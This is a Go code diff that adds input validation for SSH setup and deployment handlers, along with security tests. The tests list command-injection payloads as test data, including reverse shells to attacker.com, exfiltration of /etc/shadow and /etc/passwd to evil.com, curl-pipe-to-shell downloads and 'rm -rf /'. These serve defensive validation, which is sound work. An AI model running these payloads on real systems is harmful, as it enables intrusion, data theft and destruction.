w.Header().Set("Content-Type", "application/json") + + if r.Method != "POST" { + http.Error(w, "Method not allowed", http.StatusMethodNotAllowed) + return + } + + var ollamaRequest struct { + Endpoint string `json:"endpoint"` + } + + if err := json.NewDecoder(r.Body).Decode(&ollamaRequest); err != nil { + http.Error(w, "Invalid JSON payload", http.StatusBadRequest) + return + } + + // Validate input + if ollamaRequest.Endpoint == "" { + response := map[string]interface{}{ + "valid": false, + "message": "Endpoint is required", + "timestamp": time.Now().Unix(), + } + w.WriteHeader(http.StatusBadRequest) + json.NewEncoder(w).Encode(response) + return + } + + // Test the Ollama endpoint + isValid, models, err := sm.ValidateOllamaEndpoint(ollamaRequest.Endpoint) + + if !isValid || err != nil { + message := "Failed to connect to Ollama endpoint" + if err != nil { + message = err.Error() + } + + response := map[string]interface{}{ + "valid": false, + "message": message, + "timestamp": time.Now().Unix(), + } + w.WriteHeader(http.StatusBadRequest) + json.NewEncoder(w).Encode(response) + return + } + + // Success response + response := map[string]interface{}{ + "valid": true, + "message": fmt.Sprintf("Successfully connected to Ollama endpoint. Found %d models.", len(models)), + "models": models, + "endpoint": ollamaRequest.Endpoint, + "timestamp": time.Now().Unix(), + } + + json.NewEncoder(w).Encode(response) + } +} + func handleSetupHealth(w http.ResponseWriter, r *http.Request) { w.Header().Set("Content-Type", "application/json") health := map[string]interface{}{ @@ -1575,6 +1646,9 @@ func handleTestSSH(sm *api.SetupManager) http.HandlerFunc { return } + // SECURITY: Limit request body size to prevent memory exhaustion + r.Body = http.MaxBytesReader(w, r.Body, 32*1024) // 32KB limit + var request struct { IP string `json:"ip"` SSHKey string `json:"sshKey"` @@ -1584,7 +1658,11 @@ func handleTestSSH(sm *api.SetupManager) http.HandlerFunc { } if err := json.NewDecoder(r.Body).Decode(&request); err != nil { - http.Error(w, "Invalid request body", http.StatusBadRequest) + if err.Error() == "http: request body too large" { + http.Error(w, "Request body too large", http.StatusRequestEntityTooLarge) + } else { + http.Error(w, "Invalid request body", http.StatusBadRequest) + } return } @@ -1629,11 +1707,34 @@ func handleDeployService(sm *api.SetupManager) http.HandlerFunc { } `json:"config"` } + // SECURITY: Limit request body size for deployment requests + r.Body = http.MaxBytesReader(w, r.Body, 64*1024) // 64KB limit for deployment config + if err := json.NewDecoder(r.Body).Decode(&request); err != nil { - http.Error(w, "Invalid request body", http.StatusBadRequest) + if err.Error() == "http: request body too large" { + http.Error(w, "Request body too large", http.StatusRequestEntityTooLarge) + } else { + http.Error(w, "Invalid request body", http.StatusBadRequest) + } return } + // SECURITY: Additional validation for port configuration + ports := []int{request.Config.Ports.API, request.Config.Ports.MCP, request.Config.Ports.WebUI, request.Config.Ports.P2P} + for i, port := range ports { + if port <= 0 || port > 65535 { + http.Error(w, fmt.Sprintf("Invalid port %d: must be between 1 and 65535", port), http.StatusBadRequest) + return + } + // Check for port conflicts + for j, otherPort := range ports { + if i != j && port == otherPort && port != 0 { + http.Error(w, fmt.Sprintf("Port conflict: port %d is specified multiple times", port), http.StatusBadRequest) + return + } + } + } + // Convert the struct config to a map[string]interface{} format that the backend expects configMap := map[string]interface{}{ "ports": map[string]interface{}{ diff --git a/pkg/security/attack_vector_test.go b/pkg/security/attack_vector_test.go new file mode 100644 index 00000000..a5a3e8de --- /dev/null +++ b/pkg/security/attack_vector_test.go @@ -0,0 +1,214 @@ +package security + +import ( + "testing" +) + +// TestAttackVectorPrevention tests that our security measures prevent common attack vectors +func TestAttackVectorPrevention(t *testing.T) { + validator := NewSecurityValidator() + + t.Run("SSH Command Injection Prevention", func(t *testing.T) { + // These are actual attack vectors that could be used to compromise systems + maliciousInputs := []struct { + field string + value string + attack string + }{ + {"IP", "192.168.1.1; rm -rf /", "Command chaining via semicolon"}, + {"IP", "192.168.1.1`whoami`", "Command substitution via backticks"}, + {"IP", "192.168.1.1$(id)", "Command substitution via dollar parentheses"}, + {"IP", "192.168.1.1\ncat /etc/passwd", "Newline injection"}, + {"IP", "192.168.1.1 | nc attacker.com 4444", "Pipe redirection attack"}, + + {"Username", "user; curl http://evil.com/steal", "Data exfiltration via command chaining"}, + {"Username", "user`wget http://evil.com/malware`", "Remote code download"}, + {"Username", "user$(curl -X POST -d @/etc/shadow evil.com)", "Data theft"}, + {"Username", "user\nsudo rm -rf /*", "Privilege escalation attempt"}, + {"Username", "user && echo 'malicious' > /tmp/backdoor", "File system manipulation"}, + {"Username", "user'test", "Quote breaking"}, + {"Username", "user\"test", "Double quote injection"}, + {"Username", "user test", "Space injection"}, + {"Username", "user/../../etc/passwd", "Path traversal in username"}, + + {"Password", "pass`nc -e /bin/sh attacker.com 4444`", "Reverse shell via password"}, + {"Password", "pass; curl http://evil.com", "Network exfiltration"}, + {"Password", "pass$(cat /etc/hosts)", "File reading"}, + {"Password", "pass'||curl evil.com", "OR injection with network call"}, + {"Password", "pass\nwget http://evil.com/backdoor", "Payload download"}, + {"Password", "pass$USER", "Environment variable expansion"}, + } + + for _, attack := range maliciousInputs { + var err error + + switch attack.field { + case "IP": + err = validator.ValidateIP(attack.value) + case "Username": + err = validator.ValidateUsername(attack.value) + case "Password": + err = validator.ValidatePassword(attack.value) + } + + if err == nil { + t.Errorf("SECURITY VULNERABILITY: %s attack was not blocked: %s", + attack.attack, attack.value) + } else { + t.Logf("✓ Blocked %s: %s -> %s", attack.attack, attack.value, err.Error()) + } + } + }) + + t.Run("SSH Connection Request Attack Prevention", func(t *testing.T) { + // Test complete SSH connection requests with various attack vectors + attackRequests := []struct { + ip string + username string + password string + sshKey string + port int + attack string + }{ + { + ip: "192.168.1.1; curl http://attacker.com/data-theft", + username: "ubuntu", + password: "password", + port: 22, + attack: "IP-based command injection", + }, + { + ip: "192.168.1.1", + username: "ubuntu`wget http://evil.com/malware -O /tmp/backdoor`", + password: "password", + port: 22, + attack: "Username-based malware download", + }, + { + ip: "192.168.1.1", + username: "ubuntu", + password: "pass$(curl -d @/etc/passwd http://attacker.com/steal)", + port: 22, + attack: "Password-based data exfiltration", + }, + { + ip: "192.168.1.1", + username: "ubuntu", + password: "", + sshKey: "malicious-key`rm -rf /`not-a-real-key", + port: 22, + attack: "SSH key with embedded command", + }, + { + ip: "192.168.1.1", + username: "ubuntu", + password: "password", + port: 99999, + attack: "Invalid port number", + }, + } + + for _, attack := range attackRequests { + err := validator.ValidateSSHConnectionRequest( + attack.ip, attack.username, attack.password, attack.sshKey, attack.port) + + if err == nil { + t.Errorf("SECURITY VULNERABILITY: %s was not blocked", attack.attack) + } else { + t.Logf("✓ Blocked %s: %s", attack.attack, err.Error()) + } + } + }) + + t.Run("Command Sanitization Prevention", func(t *testing.T) { + // Test that command sanitization prevents dangerous operations + dangerousCommands := []struct { + input string + attack string + }{ + {"rm -rf /; echo 'gotcha'", "File system destruction"}, + {"curl http://evil.com/steal | sh", "Remote code execution"}, + {"nc -e /bin/bash attacker.com 4444", "Reverse shell"}, + {"cat /etc/passwd | base64 | curl -d @- http://evil.com", "Data exfiltration pipeline"}, + {"`wget http://evil.com/malware -O /tmp/backdoor`", "Backdoor installation"}, + {"$(python -c 'import os; os.system(\"rm -rf /\")')", "Python-based file deletion"}, + {"echo malicious > /etc/crontab", "Persistence via cron"}, + {"chmod 777 /etc/shadow", "Permission escalation"}, + {"/bin/sh -c 'curl http://evil.com'", "Shell escape"}, + {"exec(\"curl http://attacker.com\")", "Execution function abuse"}, + } + + for _, cmd := range dangerousCommands { + sanitized := validator.SanitizeForCommand(cmd.input) + + // Check that dangerous characters were removed + if sanitized == cmd.input { + t.Errorf("SECURITY VULNERABILITY: Dangerous command was not sanitized: %s", cmd.input) + } else { + t.Logf("✓ Sanitized %s: '%s' -> '%s'", cmd.attack, cmd.input, sanitized) + } + + // Ensure key dangerous patterns are removed + dangerousPatterns := []string{";", "|", "`", "$", "(", ")", "<", ">"} + for _, pattern := range dangerousPatterns { + if containsPattern(cmd.input, pattern) && containsPattern(sanitized, pattern) { + t.Errorf("SECURITY ISSUE: Dangerous pattern '%s' not removed from: %s", + pattern, cmd.input) + } + } + } + }) + + t.Run("Buffer Overflow Prevention", func(t *testing.T) { + // Test that our length limits prevent buffer overflow attacks + oversizedInputs := []struct { + field string + size int + }{ + {"IP", 1000}, // Much larger than any valid IP + {"Username", 500}, // Larger than Unix username limit + {"Password", 1000}, // Very large password + {"SSH Key", 20000}, // Larger than our 16KB limit + {"Hostname", 2000}, // Larger than DNS limit + } + + for _, input := range oversizedInputs { + largeString := string(make([]byte, input.size)) + for i := range largeString { + largeString = string(append([]byte(largeString[:i]), 'A')) + largeString[i+1:] + } + + var err error + switch input.field { + case "IP": + err = validator.ValidateIP(largeString) + case "Username": + err = validator.ValidateUsername(largeString) + case "Password": + err = validator.ValidatePassword(largeString) + case "SSH Key": + err = validator.ValidateSSHKey("-----BEGIN RSA PRIVATE KEY-----\n" + largeString + "\n-----END RSA PRIVATE KEY-----") + case "Hostname": + err = validator.ValidateHostname(largeString) + } + + if err == nil { + t.Errorf("SECURITY VULNERABILITY: Oversized %s (%d bytes) was not rejected", + input.field, input.size) + } else { + t.Logf("✓ Rejected oversized %s (%d bytes): %s", + input.field, input.size, err.Error()) + } + } + }) +} + +// Helper function to check if a string contains a pattern +func containsPattern(s, pattern string) bool { + for i := 0; i <= len(s)-len(pattern); i++ { + if s[i:i+len(pattern)] == pattern { + return true + } + } + return false +} \ No newline at end of file diff --git a/pkg/security/validation.go b/pkg/security/validation.go new file mode 100644 index 00000000..124f5423 --- /dev/null +++ b/pkg/security/validation.go @@ -0,0 +1,369 @@ +package security + +import ( + "fmt" + "net" + "regexp" + "strconv" + "strings" + "unicode" +) + +// ValidationError represents a security validation error +type ValidationError struct { + Field string + Message string +} + +func (e ValidationError) Error() string { + return fmt.Sprintf("%s: %s", e.Field, e.Message) +} + +// SecurityValidator provides zero-trust input validation +type SecurityValidator struct { + maxStringLength int + maxIPLength int + maxUsernameLength int + maxPasswordLength int +} + +// NewSecurityValidator creates a new validator with safe defaults +func NewSecurityValidator() *SecurityValidator { + return &SecurityValidator{ + maxStringLength: 1024, // Maximum string length + maxIPLength: 45, // IPv6 max length + maxUsernameLength: 32, // Standard Unix username limit + maxPasswordLength: 128, // Reasonable password limit + } +} + +// ValidateIP validates IP addresses with zero-trust approach +func (v *SecurityValidator) ValidateIP(ip string) error { + if ip == "" { + return ValidationError{"ip", "IP address is required"} + } + + if len(ip) > v.maxIPLength { + return ValidationError{"ip", "IP address too long"} + } + + // Check for dangerous characters that could be used in command injection + if containsUnsafeChars(ip, []rune{'`', '$', '(', ')', ';', '&', '|', '<', '>', '\n', '\r'}) { + return ValidationError{"ip", "IP address contains invalid characters"} + } + + // Validate IP format + if net.ParseIP(ip) == nil { + return ValidationError{"ip", "Invalid IP address format"} + } + + return nil +} + +// ValidateUsername validates SSH usernames +func (v *SecurityValidator) ValidateUsername(username string) error { + if username == "" { + return ValidationError{"username", "Username is required"} + } + + if len(username) > v.maxUsernameLength { + return ValidationError{"username", fmt.Sprintf("Username too long (max %d characters)", v.maxUsernameLength)} + } + + // Check for command injection characters + if containsUnsafeChars(username, []rune{'`', '$', '(', ')', ';', '&', '|', '<', '>', '\n', '\r', ' ', '"', '\'', '\\', '/'}) { + return ValidationError{"username", "Username contains invalid characters"} + } + + // Validate Unix username format (alphanumeric, underscore, dash, starting with letter/underscore) + matched, err := regexp.MatchString("^[a-zA-Z_][a-zA-Z0-9_-]*$", username) + if err != nil || !matched { + return ValidationError{"username", "Username must start with letter/underscore and contain only alphanumeric characters, underscores, and dashes"} + } + + return nil +} + +// ValidatePassword validates SSH passwords +func (v *SecurityValidator) ValidatePassword(password string) error { + // Password can be empty if SSH keys are used + if password == "" { + return nil + } + + if len(password) > v.maxPasswordLength { + return ValidationError{"password", fmt.Sprintf("Password too long (max %d characters)", v.maxPasswordLength)} + } + + // Check for shell metacharacters that could break command execution + if containsUnsafeChars(password, []rune{'`', '$', '\n', '\r', '\'', ';', '|', '&'}) { + return ValidationError{"password", "Password contains characters that could cause security issues"} + } + + return nil +} + +// ValidateSSHKey validates SSH private keys +func (v *SecurityValidator) ValidateSSHKey(key string) error { + // SSH key can be empty if password auth is used + if key == "" { + return nil + } + + // Increased limit to accommodate large RSA keys (8192-bit RSA can be ~6.5KB) + if len(key) > 16384 { // 16KB should handle even very large keys + return ValidationError{"ssh_key", "SSH key too long (max 16KB)"} + } + + // Check for basic SSH key format + if strings.Contains(key, "-----BEGIN") { + // Private key format - check for proper termination + if !strings.Contains(key, "-----END") { + return ValidationError{"ssh_key", "SSH private key appears malformed - missing END marker"} + } + + // Check for common private key types + validKeyTypes := []string{ + "-----BEGIN RSA PRIVATE KEY-----", + "-----BEGIN DSA PRIVATE KEY-----", + "-----BEGIN EC PRIVATE KEY-----", + "-----BEGIN OPENSSH PRIVATE KEY-----", + "-----BEGIN PRIVATE KEY-----", // PKCS#8 format + } + + hasValidType := false + for _, keyType := range validKeyTypes { + if strings.Contains(key, keyType) { + hasValidType = true + break + } + } + + if !hasValidType { + return ValidationError{"ssh_key", "SSH private key type not recognized"} + } + + } else if strings.HasPrefix(key, "ssh-") { + // Public key format - shouldn't be used for private key field + return ValidationError{"ssh_key", "Public key provided where private key expected"} + } else { + return ValidationError{"ssh_key", "SSH key format not recognized - must be PEM-encoded private key"} + } + + // Check for suspicious content that could indicate injection attempts + suspiciousPatterns := []string{ + "$(", "`", ";", "|", "&", "<", ">", "\n\n\n", // command injection patterns + } + + for _, pattern := range suspiciousPatterns { + if strings.Contains(key, pattern) && !strings.Contains(pattern, "\n") { // newlines are normal in keys + return ValidationError{"ssh_key", "SSH key contains suspicious content"} + } + } + + return nil +} + +// ValidatePort validates port numbers +func (v *SecurityValidator) ValidatePort(port int) error { + if port <= 0 || port > 65535 { + return ValidationError{"port", "Port must be between 1 and 65535"} + } + + // Warn about privileged ports + if port < 1024 && port != 22 && port != 80 && port != 443 { + return ValidationError{"port", "Avoid using privileged ports (< 1024) unless necessary"} + } + + return nil +} + +// ValidateHostname validates hostnames +func (v *SecurityValidator) ValidateHostname(hostname string) error { + if hostname == "" { + return ValidationError{"hostname", "Hostname is required"} + } + + if len(hostname) > 253 { + return ValidationError{"hostname", "Hostname too long (max 253 characters)"} + } + + // Check for command injection characters + if containsUnsafeChars(hostname, []rune{'`', '$', '(', ')', ';', '&', '|', '<', '>', '\n', '\r', ' ', '"', '\''}) { + return ValidationError{"hostname", "Hostname contains invalid characters"} + } + + // Validate hostname format (RFC 1123) + matched, err := regexp.MatchString("^[a-zA-Z0-9]([a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9])?(\\.([a-zA-Z0-9]([a-zA-Z0-9\\-]{0,61}[a-zA-Z0-9])?))*$", hostname) + if err != nil || !matched { + return ValidationError{"hostname", "Invalid hostname format"} + } + + return nil +} + +// ValidateClusterSecret validates cluster secrets +func (v *SecurityValidator) ValidateClusterSecret(secret string) error { + if secret == "" { + return ValidationError{"cluster_secret", "Cluster secret is required"} + } + + if len(secret) < 32 { + return ValidationError{"cluster_secret", "Cluster secret too short (minimum 32 characters)"} + } + + if len(secret) > 128 { + return ValidationError{"cluster_secret", "Cluster secret too long (maximum 128 characters)"} + } + + // Ensure it's hexadecimal (common for generated secrets) + matched, err := regexp.MatchString("^[a-fA-F0-9]+$", secret) + if err != nil || !matched { + // If not hex, ensure it's at least alphanumeric + if !isAlphanumeric(secret) { + return ValidationError{"cluster_secret", "Cluster secret must be alphanumeric or hexadecimal"} + } + } + + return nil +} + +// ValidateFilePath validates file paths +func (v *SecurityValidator) ValidateFilePath(path string) error { + if path == "" { + return ValidationError{"file_path", "File path is required"} + } + + if len(path) > 4096 { + return ValidationError{"file_path", "File path too long"} + } + + // Check for command injection and directory traversal + if containsUnsafeChars(path, []rune{'`', '$', '(', ')', ';', '&', '|', '<', '>', '\n', '\r'}) { + return ValidationError{"file_path", "File path contains unsafe characters"} + } + + // Check for directory traversal attempts + if strings.Contains(path, "..") { + return ValidationError{"file_path", "Directory traversal detected in file path"} + } + + // Ensure absolute paths + if !strings.HasPrefix(path, "/") { + return ValidationError{"file_path", "File path must be absolute"} + } + + return nil +} + +// SanitizeForCommand sanitizes strings for use in shell commands +func (v *SecurityValidator) SanitizeForCommand(input string) string { + // Remove dangerous characters and control characters + result := strings.Map(func(r rune) rune { + if r < 32 || r == 127 { + return -1 // Remove control characters + } + switch r { + case '`', '$', ';', '&', '|', '<', '>', '(', ')', '"', '\'', '\\', '*', '?', '[', ']', '{', '}': + return -1 // Remove shell metacharacters and globbing chars + } + return r + }, input) + + // Trim whitespace and collapse multiple spaces + result = strings.TrimSpace(result) + + // Replace multiple spaces with single space + for strings.Contains(result, " ") { + result = strings.ReplaceAll(result, " ", " ") + } + + return result +} + +// Helper function to check for unsafe characters +func containsUnsafeChars(s string, unsafeChars []rune) bool { + for _, char := range s { + for _, unsafe := range unsafeChars { + if char == unsafe { + return true + } + } + } + return false +} + +// Helper function to check if string is alphanumeric +func isAlphanumeric(s string) bool { + for _, char := range s { + if !unicode.IsLetter(char) && !unicode.IsDigit(char) { + return false + } + } + return true +} + +// ValidateSSHConnectionRequest validates an SSH connection request +func (v *SecurityValidator) ValidateSSHConnectionRequest(ip, username, password, sshKey string, port int) error { + if err := v.ValidateIP(ip); err != nil { + return err + } + + if err := v.ValidateUsername(username); err != nil { + return err + } + + if err := v.ValidatePassword(password); err != nil { + return err + } + + if err := v.ValidateSSHKey(sshKey); err != nil { + return err + } + + if err := v.ValidatePort(port); err != nil { + return err + } + + // Ensure at least one authentication method is provided + if password == "" && sshKey == "" { + return ValidationError{"auth", "Either password or SSH key must be provided"} + } + + return nil +} + +// ValidatePortList validates a list of port numbers +func (v *SecurityValidator) ValidatePortList(ports []string) error { + if len(ports) > 50 { // Reasonable limit + return ValidationError{"ports", "Too many ports specified (max 50)"} + } + + for i, portStr := range ports { + port, err := strconv.Atoi(portStr) + if err != nil { + return ValidationError{"ports", fmt.Sprintf("Port %d is not a valid number: %s", i+1, portStr)} + } + + if err := v.ValidatePort(port); err != nil { + return ValidationError{"ports", fmt.Sprintf("Port %d invalid: %s", i+1, err.Error())} + } + } + + return nil +} + +// ValidateIPList validates a list of IP addresses +func (v *SecurityValidator) ValidateIPList(ips []string) error { + if len(ips) > 100 { // Reasonable limit + return ValidationError{"ip_list", "Too many IPs specified (max 100)"} + } + + for i, ip := range ips { + if err := v.ValidateIP(ip); err != nil { + return ValidationError{"ip_list", fmt.Sprintf("IP %d invalid: %s", i+1, err.Error())} + } + } + + return nil +} \ No newline at end of file diff --git a/pkg/security/validation_test.go b/pkg/security/validation_test.go new file mode 100644 index 00000000..1bd2cd20 --- /dev/null +++ b/pkg/security/validation_test.go @@ -0,0 +1,221 @@ +package security + +import ( + "strings" + "testing" +) + +func TestSecurityValidator(t *testing.T) { + validator := NewSecurityValidator() + + // Test IP validation + t.Run("IP Validation", func(t *testing.T) { + validIPs := []string{"192.168.1.1", "127.0.0.1", "::1", "2001:db8::1"} + for _, ip := range validIPs { + if err := validator.ValidateIP(ip); err != nil { + t.Errorf("Valid IP %s rejected: %v", ip, err) + } + } + + invalidIPs := []string{ + "", // empty + "999.999.999.999", // invalid range + "192.168.1.1; rm -rf /", // command injection + "192.168.1.1`whoami`", // command substitution + "192.168.1.1$(id)", // command substitution + "192.168.1.1\ncat /etc/passwd", // newline injection + } + for _, ip := range invalidIPs { + if err := validator.ValidateIP(ip); err == nil { + t.Errorf("Invalid IP %s was accepted", ip) + } + } + }) + + // Test username validation + t.Run("Username Validation", func(t *testing.T) { + validUsernames := []string{"ubuntu", "user123", "_system", "test-user"} + for _, username := range validUsernames { + if err := validator.ValidateUsername(username); err != nil { + t.Errorf("Valid username %s rejected: %v", username, err) + } + } + + invalidUsernames := []string{ + "", // empty + "user; rm -rf /", // command injection + "user`id`", // command substitution + "user$(whoami)", // command substitution + "user\ncat /etc/passwd", // newline injection + "user name", // space + "user'test", // single quote + "user\"test", // double quote + "123user", // starts with number + } + for _, username := range invalidUsernames { + if err := validator.ValidateUsername(username); err == nil { + t.Errorf("Invalid username %s was accepted", username) + } + } + }) + + // Test password validation + t.Run("Password Validation", func(t *testing.T) { + validPasswords := []string{ + "", // empty is allowed + "simplepassword", + "complex@password#123", + "unicode-пароль", + } + for _, password := range validPasswords { + if err := validator.ValidatePassword(password); err != nil { + t.Errorf("Valid password rejected: %v", err) + } + } + + invalidPasswords := []string{ + "password`whoami`", // command substitution + "password$(id)", // command substitution + "password\necho malicious", // newline injection + "password'break", // single quote injection + "password$USER", // variable expansion + } + for _, password := range invalidPasswords { + if err := validator.ValidatePassword(password); err == nil { + t.Errorf("Invalid password was accepted") + } + } + }) + + // Test SSH key validation + t.Run("SSH Key Validation", func(t *testing.T) { + validKeys := []string{ + "", // empty is allowed + "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA...\n-----END RSA PRIVATE KEY-----", + "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjE...\n-----END OPENSSH PRIVATE KEY-----", + } + for _, key := range validKeys { + if err := validator.ValidateSSHKey(key); err != nil { + t.Errorf("Valid SSH key rejected: %v", err) + } + } + + invalidKeys := []string{ + "ssh-rsa AAAAB3NzaC1yc2E...", // public key where private expected + "invalid-key-format", + "-----BEGIN RSA PRIVATE KEY-----\ntruncated", // malformed + } + for _, key := range invalidKeys { + if err := validator.ValidateSSHKey(key); err == nil { + t.Errorf("Invalid SSH key was accepted") + } + } + }) + + // Test command sanitization + t.Run("Command Sanitization", func(t *testing.T) { + testCases := []struct { + input string + expected string + safe bool + }{ + {"ls -la", "ls -la", true}, + {"systemctl status nginx", "systemctl status nginx", true}, + {"echo `whoami`", "echo whoami", false}, // backticks removed + {"rm -rf /; echo done", "rm -rf / echo done", false}, // semicolon removed + {"ls | grep test", "ls grep test", false}, // pipe removed + {"echo $USER", "echo USER", false}, // dollar removed + } + + for _, tc := range testCases { + result := validator.SanitizeForCommand(tc.input) + if result != tc.expected { + t.Errorf("Command sanitization failed: input=%s, expected=%s, got=%s", + tc.input, tc.expected, result) + } + + isSafe := (result == tc.input) + if isSafe != tc.safe { + t.Errorf("Safety expectation failed for input=%s: expected safe=%v, got safe=%v", + tc.input, tc.safe, isSafe) + } + } + }) + + // Test port validation + t.Run("Port Validation", func(t *testing.T) { + validPorts := []int{22, 80, 443, 8080, 3000} + for _, port := range validPorts { + if err := validator.ValidatePort(port); err != nil { + t.Errorf("Valid port %d rejected: %v", port, err) + } + } + + invalidPorts := []int{0, -1, 65536, 99999} + for _, port := range invalidPorts { + if err := validator.ValidatePort(port); err == nil { + t.Errorf("Invalid port %d was accepted", port) + } + } + }) + + // Test cluster secret validation + t.Run("Cluster Secret Validation", func(t *testing.T) { + validSecrets := []string{ + "abcdef1234567890abcdef1234567890", // 32 char hex + "a1b2c3d4e5f6789012345678901234567890abcd", // longer hex + "alphanumericSecr3t123456789012345678", // alphanumeric, 38 chars + } + for _, secret := range validSecrets { + if err := validator.ValidateClusterSecret(secret); err != nil { + t.Errorf("Valid secret rejected: %v", err) + } + } + + invalidSecrets := []string{ + "", // empty + "short", // too short + strings.Repeat("a", 200), // too long + } + for _, secret := range invalidSecrets { + if err := validator.ValidateClusterSecret(secret); err == nil { + t.Errorf("Invalid secret was accepted") + } + } + }) +} + +func TestValidateSSHConnectionRequest(t *testing.T) { + validator := NewSecurityValidator() + + // Test valid request + err := validator.ValidateSSHConnectionRequest("192.168.1.1", "ubuntu", "password123", "", 22) + if err != nil { + t.Errorf("Valid SSH connection request rejected: %v", err) + } + + // Test with SSH key instead of password + err = validator.ValidateSSHConnectionRequest("192.168.1.1", "ubuntu", "", + "-----BEGIN RSA PRIVATE KEY-----\ntest\n-----END RSA PRIVATE KEY-----", 22) + if err != nil { + t.Errorf("Valid SSH key request rejected: %v", err) + } + + // Test missing both password and key + err = validator.ValidateSSHConnectionRequest("192.168.1.1", "ubuntu", "", "", 22) + if err == nil { + t.Error("Request with no auth method was accepted") + } + + // Test command injection in IP + err = validator.ValidateSSHConnectionRequest("192.168.1.1; rm -rf /", "ubuntu", "password", "", 22) + if err == nil { + t.Error("Command injection in IP was accepted") + } + + // Test command injection in username + err = validator.ValidateSSHConnectionRequest("192.168.1.1", "ubuntu`whoami`", "password", "", 22) + if err == nil { + t.Error("Command injection in username was accepted") + } +} \ No newline at end of file